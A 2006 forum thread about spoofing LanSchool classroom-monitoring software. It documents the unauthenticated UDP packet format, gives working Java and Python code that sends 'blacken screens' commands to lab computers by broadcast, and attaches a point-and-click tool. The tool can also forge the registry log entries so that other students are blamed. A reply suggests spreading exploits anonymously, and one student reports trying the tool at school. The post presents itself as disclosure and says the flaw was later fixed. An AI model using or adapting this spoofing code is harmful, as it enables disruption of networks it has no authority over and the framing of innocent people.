Computer Science Canada
LanSchool Hack

Dan
Posted: Thu Feb 23, 2006 5:19 pm   Post subject: LanSchool Hack

UPDATE: LanSchool has fixed the potential security flaw in v7.0 of their software in May 2007, so the below no longer affects LanSchool.

NOTE: The below is only the opinion of its poster, Dan. Like all posts on CompSci.ca, it is only opinion and only the opinion of the poster.

NOTE: "LanSchooled" is not the same as LanSchool, nor does it provide the same functions, or even work now that the potential security flaw has been fixed in LanSchool.

For more up to date information see the wiki: http://wiki.compsci.ca/index.php?title=LanSchool and http://lanschool.com



Normally I would not think of posting such work on this site, but this is part of my campaign to get school boards to realise that they should not be using LanSchool and that there are massive security flaws in it.

The Story
During grade 12 I changed schools. The new school I went to had a lot better networks and computer labs, which was a good thing, or so I thought. After playing around for a bit I noticed a little green icon in the task bar that did not seem to do anything. Looking further into this I found out it was a program named LanSchool (http://www.lanschool.com/). Now what is LanSchool, you may ask? The name makes it sound innocent enough, maybe something to help students? Well, it may have started out that way, but what it has become is basically a Trojan horse program for teachers to use to watch everything you are doing (including watching your screen) as well as giving them the ability to control your computer or all computers in the lab at the same time. As usual the school board decided to spend money on something they could get for free and got a crappier version than what they could get for free.

So I started looking into LanSchool more and found a demo version on their site. This demo version could not interact with the real versions the school used and would not allow students to do any damage. First I looked into how it was affecting the registry of the computers it was on, and found that every time the teacher application sent a command to the student versions it recorded which Windows user sent the command, the Windows name of the computer they were on and the time in the registries of every computer on the network. This meant that finding a full version of the software, although not hard, would land you in a lot of trouble unless you brought your own computer to school, and even then it still could.

So I began to look at the packets it was sending and to my shock they were UDP and not TCP, and they had no encryption or encoding at all. This means that it is extremely easy to spoof the packets. So I quickly wrote up a simple Java program to test out my theory. After some time and experimentation I decoded what most of the packets meant and was able to control the demo version of LanSchool. After looking more at the packets I noticed that the difference between the demo version and the real version is that the demo version uses only one channel, which is never used by the real version. So it was simply a matter of changing the channel byte to a real channel in the packet to get it to work with most if not all versions of LanSchool. This also allowed me to make the registry logs say whatever I wanted, including blaming other students for the hack.

Now, being the nice guy that I am, I e-mailed my findings to LanSchool and suggested several ways to fix this exploit. Their response was basically that they would rather spend time and effort enforcing the rules of the school and the law than fixing their program, and they made threats that legal action as well as suspensions could take place if I were to use this program. So next I went to my school and actually demonstrated (with their permission) the exploit and how insecure it was. Again nothing happened with my efforts, so a month later I published how the packet worked on compsci.ca.

It is now almost 2 years later and I have rewritten my hack so anyone, even script kiddies, can use it, with a nice GUI and everything. My hope in doing this is to teach people why programming like LanSchool did is bad security-wise and to encourage the school board to buy (if they must) better software from companies that know what they are doing and are willing to change with the times. BTW, LanSchool's website still claims that there are no known bugs with LanSchool.


The Packet
This is what the packet looks like:

Mode | Version | Channel [to blocks] |00 or DF |DA | D1| ___data here__|__log info__|

Mode is basically the command you are sending. So far I have found a lot of them, and here are some examples:

    00 - start broadcast of screens
    04 - restore computer screens
    07 - blacken all screens
    08 - unload LanSchool or just freeze it up good


The version corresponds to what version of LanSchool you are running: versions 5.x seem to like 01, and 02 seems to be for 6.x.

The channel area is pretty simple; it is the channel number. The demo version uses channel FF in hex or 255 in dec.

The next 3 bytes are kind of hard to figure out but seem to always be the same in a given version of LanSchool. For 5.x and the low 6.xs the 1st byte here should be 00; for 6.5 and some others it should be DF in hex. The other 2 seem to always be the same.

The data area is data for that command; some commands do not need this, like blacken all screens.

The log area is where it puts the name of your computer and then your username for logging. This area also has a lot of useless 00 bytes that just take up space.


Application of the above
The following is a very simple Java application that will take advantage of the above information to black out screens for the demo version of LanSchool 6.5, only on the computer you are using. To send to all computers in a network you could use the IP 255.255.255.255.

code:

import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;

public class LanHack
{
   public static void main(String args[])
   {
      try
      {
         // Send only to this machine; use 255.255.255.255 to reach the whole lab
         InetAddress ipaddr = InetAddress.getByName("127.0.0.1");
         DatagramSocket mysocket = new DatagramSocket();
         // Mode 07 (blacken screens), version 02 (6.x), channel FF (demo),
         // then the fixed 3F DA D1 bytes for this version
         byte sendbuf2[] = {(byte)0x07, (byte)0x02, (byte)0xff, (byte)0x3f, (byte)0xda, (byte)0xd1};
         // LanSchool listens on UDP port 796
         DatagramPacket sendPacket2 = new DatagramPacket(sendbuf2, sendbuf2.length, ipaddr, 796);
         mysocket.send(sendPacket2);
         mysocket.close();
      } catch (Exception e) {
         e.printStackTrace();
      }
   }
}


Note that for lesser versions of LanSchool you would have to change the 0x3f to 0x00 and possibly 0x02 to 0x01 or another number. Also this is set to the demo channel 0xff, and if you wanted to send to a real version you would have to set it to 0xChanNumberInHex.


LanSchooled
Now for what I did with all this knowledge to make a point-and-click LanSchool hack that can help you understand how the packets work. Remember that this is only for educational use and should not be used for evil purposes, and I take no responsibility for what you do with it. With that said, I only tested it on the demo version, but I would like to hear from people if they got it to work on other versions.

How to use
The top frame shows the packet that will be sent; you can use the easy set up buttons below it to set the packet to do what you want. The times bar will let you say how many times you want to send out the packet.

Setting the channel to "ALL" will send to all possible LanSchool channels, including the demo one. Setting the version to "9" will send version 2 but with 0x00 rather than 0xdf. Setting it to "2" will send version 2 but with 0xdf. All other version numbers send their version and 0x00.

The log info lets you set what the user name and computer name are set to in the registry logs of the computers affected. I would strongly recommend people not exploit this to get people in trouble, since that is just evil.

You must hit send to actually send the packet. The easy set up buttons just configure the packet you are going to send.

Where to get
A Windows executable, an executable jar and the Java source code have all been included in this post and should appear below. In all cases you need Java or a JVM installed.


Edit: Also see http://www.compsci.ca/wiki/index.php?title=LanSchool





LanSchooled.java
Description: The Java source code. No longer works; flaw fixed in v7.0 of LanSchool. This is not a copy of LanSchool and in no way replaces it or does the same thing.
(Filename: LanSchooled.java, 13.41 KB, downloaded 6976 times)

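Putting the packet layout from the post above into code, as an added example that is not part of the original post and is not LanSchool's or LanSchooled's code: it builds and decodes control packets with the six-byte header the post describes (mode, version, channel, the version-dependent 00/DF/3F byte, then DA D1), and it reproduces the exact six bytes the Java program sends. The layout of the log area (two NUL-terminated ASCII strings padded with 00 bytes) and the treatment of every mode other than 07 as carrying opaque data are assumptions of this example, since the post gives no lengths. The `send` helper, UDP port 796 and the broadcast address come straight from the post.

```python
"""Build and decode LanSchool-style UDP control packets as laid out in the post.

Added example; the six-byte header follows the post, the log-area encoding
(two NUL-terminated ASCII strings, zero padded) is an assumption.
"""
from dataclasses import dataclass

LANSCHOOL_PORT = 796       # UDP port used by the post's Java program
DEMO_CHANNEL = 0xFF        # demo build's channel; the post says real builds never use it

# Mode bytes listed in the post
MODE_BROADCAST = 0x00      # start broadcast of screens
MODE_RESTORE = 0x04        # restore computer screens
MODE_BLACKEN = 0x07        # blacken all screens
MODE_UNLOAD = 0x08         # unload LanSchool / freeze it
MODE_NAMES = {MODE_BROADCAST: "broadcast screens", MODE_RESTORE: "restore screens",
              MODE_BLACKEN: "blacken screens", MODE_UNLOAD: "unload"}

# Byte 4 of the header depends on the version (00 for 5.x and early 6.x, DF for 6.5,
# 3F in the post's own demo packet); bytes 5 and 6 are always DA D1.
FIXED_TAIL = b"\xda\xd1"
HEADER_LEN = 6

# Commands the post confirms carry no data area (only "blacken" is stated there).
DATALESS_MODES = {MODE_BLACKEN}


@dataclass
class LanPacket:
    mode: int
    version: int
    channel: int
    marker: int                # version-dependent 4th header byte (0x00, 0xDF or 0x3F)
    data: bytes = b""          # command-specific data, absent for blacken
    computer: str = ""         # log area: computer name the sender *claims* ...
    user: str = ""             # ... and the Windows user it *claims*; nothing checks either


def build(p: LanPacket, log_pad: int = 32) -> bytes:
    """Serialise a packet; without log fields it is just header + data."""
    for name, value in (("mode", p.mode), ("version", p.version),
                        ("channel", p.channel), ("marker", p.marker)):
        if not 0 <= value <= 0xFF:
            raise ValueError(f"{name} must fit in one byte")
    header = bytes([p.mode, p.version, p.channel, p.marker]) + FIXED_TAIL
    if not (p.computer or p.user):
        return header + p.data           # bare command, e.g. the post's 6-byte blacken packet
    # ASSUMPTION: log area = two NUL-terminated ASCII strings, zero padded to log_pad bytes.
    log = p.computer.encode("ascii") + b"\0" + p.user.encode("ascii") + b"\0"
    return header + p.data + log.ljust(log_pad, b"\0")


def parse(raw: bytes) -> LanPacket:
    """Decode a captured payload; raises ValueError on anything that is not this layout."""
    if len(raw) < HEADER_LEN:
        raise ValueError("short packet")
    mode, version, channel, marker = raw[0], raw[1], raw[2], raw[3]
    if raw[4:6] != FIXED_TAIL:
        raise ValueError("bytes 5-6 are not DA D1")
    rest = raw[HEADER_LEN:]
    if mode in DATALESS_MODES:
        data, log = b"", rest
    else:
        data, log = rest, b""            # data length per mode is not documented in the post
    computer = user = ""
    if log:
        parts = log.split(b"\0")
        computer = parts[0].decode("ascii", "replace")
        user = parts[1].decode("ascii", "replace") if len(parts) > 1 else ""
    return LanPacket(mode, version, channel, marker, data, computer, user)


def describe(raw: bytes) -> str:
    """One-line summary suitable for a detection log; the sender identity is only a claim."""
    p = parse(raw)
    name = MODE_NAMES.get(p.mode, f"mode 0x{p.mode:02x}")
    chan = "demo" if p.channel == DEMO_CHANNEL else str(p.channel)
    who = f" claimed sender {p.user}@{p.computer}" if (p.computer or p.user) else ""
    return f"{name} v{p.version} channel {chan}{who}"


def blacken_demo_packet() -> bytes:
    """The exact 6 bytes the post's Java program sends to the 6.5 demo build."""
    return build(LanPacket(MODE_BLACKEN, 0x02, DEMO_CHANNEL, 0x3F))


def forged_log_packet() -> bytes:
    """Same command aimed at a real channel, with log fields naming somebody else (constructed)."""
    return build(LanPacket(MODE_BLACKEN, 0x02, 12, 0xDF, computer="LAB-07", user="jsmith"))


def send(raw: bytes, host: str = "255.255.255.255") -> None:
    """Send one packet; the broadcast address reaches every lab machine, as the post notes."""
    import socket
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.sendto(raw, (host, LANSCHOOL_PORT))


if __name__ == "__main__":
    for pkt in (blacken_demo_packet(), forged_log_packet()):
        print(pkt.hex(" "), "->", describe(pkt))
```

The point the parser makes explicit is the one the post is built on: nothing in the datagram binds it to a sender, so the computer name and user name in the log area are whatever the sender chose to write, which is why `describe` reports them as a claim rather than a fact. A network capture filtered on UDP port 796 fed through `describe` will show commands and channels, but attribution has to come from the source IP and switch port, not from the packet.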
Neo
Posted: Fri Feb 24, 2006 9:27 am

My old high school used some kind of program like this. Don't know whether it was LanSchool. I never really found any use for their computers except using a teacher's account to print as much as I wanted.
Too bad I can't go back and try this out...

So that's why they call you HACKER Dan.
[Gandalf]
Posted: Sat Feb 25, 2006 1:30 pm

I'm fairly sure my school/school board has the same thing, but they don't use LanSchool. Teachers often 'take control' of your computer, and even more often view what you are doing.
Dan
Posted: Sat Feb 25, 2006 3:08 pm

[Gandalf] wrote:
I'm fairly sure my school/school board has the same thing, but they don't use LanSchool. Teachers often 'take control' of your computer, and even more often view what you are doing.


I find that very few teachers even know about it, never mind how to use it. Usually it is only the network admin that does. Still, I would suggest reporting this to your school and/or school board to help the cause in getting rid of/fixing it.
[Gandalf]
Posted: Sat Feb 25, 2006 3:18 pm

Such is not the case in my school. Most teachers I have seen know how to use it, and the software used isn't LanSchool either, so the same exploit probably wouldn't work.
chrispminis
Posted: Sat Feb 25, 2006 3:28 pm

Such harsh replies from LanSchool. Would it be too much of a hassle to post your letter to them, and their reply? I wanna read it word for word.
Dan
Posted: Sat Feb 25, 2006 4:00 pm

chrispminis wrote:
Such harsh replies from LanSchool. Would it be too much of a hassle to post your letter to them, and their reply? I wanna read it word for word.


I would love to, but this was over 2 years ago when I made the 1st version and talked to LanSchool. I doubt I still have a copy since I moved like 3 times in between then and now, but if I find a copy I will send you one. If someone can confirm that this hack works on a full version (through legal means) I will talk to them again and post what they say.
jamonathin
Posted: Sat Feb 25, 2006 10:07 pm

My school has the LanSchool thing; it has the green ring icon. The .jar exec opened up, the exe didn't for some reason, meh. But I tried to use the black screen only to all computers and it didn't work for some reason, just nothing happened. Unfortunately I was only able to test it once quickly because I literally got it before the bell. I'm not too sure why it doesn't do anything, because I don't know our version.
rizzix
Posted: Sat Feb 25, 2006 10:29 pm

Dan, it is illegal to post such exploits.. I think... you have to first let the company "fix" them; only then can you publish them... On the other hand you could always spread the exploits widely through some anonymous network... This would force the company to "fix" them.. and there's no way to blame it on you.
Dan
Posted: Sat Feb 25, 2006 11:45 pm

rizzix wrote:
Dan, it is illegal to post such exploits.. I think... you have to first let the company "fix" them; only then can you publish them... On the other hand you could always spread the exploits widely through some anonymous network... This would force the company to "fix" them.. and there's no way to blame it on you.


I do not believe that is true in Canada, and remember this is for education reasons.


jamonathin: when you hover over the green icon it will tell you what channel it is running on; you need this to set the right channel, or just set send to all. As for the version try 0, 1, 2 and 9.
1of42
Posted: Sun Feb 26, 2006 12:24 am

Actually Dan, rizzix I believe is correct, but it's not really illegal so much as the company could sue you and probably win over it.
Dan
Posted: Sun Feb 26, 2006 1:09 am

1of42 wrote:
Actually Dan, rizzix I believe is correct, but it's not really illegal so much as the company could sue you and probably win over it.


Actually, from the law I have read, including on the RCMP web site, it says that you have to have unauthorized access to a computer system to be violating the law. If I were to use this exploit on someone else's computer system/network I would be breaking the law. But just making the exploit for educational reasons is not against the law in Canada, though it is against the law in the U.S.A.

However, there is a big difference between breaking the law and getting sued. You can do something legal and get sued. Though I find this to be rather unlikely in this case.

Also it should be noted that in Canadian hacking cases all hackers who got caught and were not actually destroying anything or stealing money were sentenced to a maximum of 12 months probation and 2 months of community service.

Though it should also be noted that the U.S. has imprisoned hackers without trials for national security reasons and could basically never let them out or let them contact anyone ever again or see a lawyer.

Edit: In addition to the above, it would be extremely bad for LanSchool to pursue criminal or civil law suits against me since the P.R. would be horrible. This company almost solely relies on schools for its income. Titles like "LanSchool sues student who tries to help" and "LanSchool exploited by students and does nothing" are not going to be big selling points for them.
rizzix
Posted: Sun Feb 26, 2006 1:13 am

Hacker Dan wrote:
Also it should be noted that in Canadian hacking cases all hackers who got caught and were not actually destroying anything or stealing money were sentenced to a maximum of 12 months probation and 2 months of community service.
US is screwed up, but Canada does give you a criminal record. I'm clean so far, hehe, I'd rather stay that way.
Dan
Posted: Sun Feb 26, 2006 1:20 am

rizzix wrote:
Hacker Dan wrote:
Also it should be noted that in Canadian hacking cases all hackers who got caught and were not actually destroying anything or stealing money were sentenced to a maximum of 12 months probation and 2 months of community service.
US is screwed up, but Canada does give you a criminal record. I'm clean so far, hehe, I'd rather stay that way.


Very true, but I am 99.5% sure that writing software alone will not get you one. You have to use it to gain unauthorised access. And that is only in some provinces; others simply do not have any law about it. The way Canadian hacking law works for the most part is that you have to break another, non-hacking-specific law. For example, if you hack into a bank and steal money you get charged with stealing money. If you destroy files you get charged with things ranging from vandalism to mischief. Just hacking into a system could get you the community service mentioned above, but writing an exploit to do it and not using it will not. It falls under free speech and such.

If you write up plans to steal money and get away with it and post them online you will not go to jail; however, if you go through with those plans you do go to jail. I believe it to be the same with software exploits, and if I do get charged with something it would be one hell of a law case since I could appeal to free speech and bring it up pretty high. By the time it was out of the courts I would be retiring and LanSchool would be long since dead.
md
Posted: Sun Feb 26, 2006 1:57 am

It's an old one but you can be charged with theft of computer time. Of course these days computer time is rather cheap...

In reality hacking is not illegal in Canada; nor is posting exploits of commercial software. You don't need to give them any notice first either, even in the States. There are big cries in the media about it from companies like Microsoft, but IIRC no one has ever been successfully sued.
Page 1 of 3  [ 45 Posts ]